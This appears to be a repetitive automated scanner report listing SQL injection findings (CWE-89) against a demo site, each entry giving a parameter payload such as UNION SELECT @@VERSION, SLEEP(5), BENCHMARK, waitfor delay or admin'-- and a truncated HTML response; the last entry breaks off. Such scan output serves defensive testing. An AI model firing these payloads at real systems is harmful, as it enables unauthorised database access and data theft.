[Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1178\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# `\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1179\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1180\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# ));waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1181\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1182\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1183\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 10--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1184\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1185Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1186\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1187\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1188\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1189\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or sleep(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1190\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1191\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1192\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. 